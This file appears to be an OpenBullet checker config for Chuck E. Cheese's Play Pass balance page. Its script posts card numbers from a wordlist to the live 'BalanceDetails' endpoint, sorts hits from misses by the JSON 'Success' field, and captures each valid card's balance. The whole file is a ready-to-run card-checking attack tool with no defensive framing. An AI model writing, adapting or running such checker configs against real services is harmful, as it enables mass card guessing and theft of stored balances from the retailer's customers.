[SETTINGS]
{
  "Name": "chuckecheese",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-07-14T17:09:11.7358075-04:00",
  "AdditionalInfo": "",
  "Author": "",
  "Version": "1.1.3",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "UserPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://www.chuckecheese.com/plan-your-visit/play-pass/BalanceDetails" 
  CONTENT "{\"CardNumber\":\"<USER>\"}" 
  CONTENTTYPE "application/json; charset=UTF-8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Success\":true" 
  KEYCHAIN Failure OR 
    KEY "\",\"Success\":false" 

PARSE "<SOURCE>" LR "Balance\":\"" "\"}" -> CAP "BALANCE" 

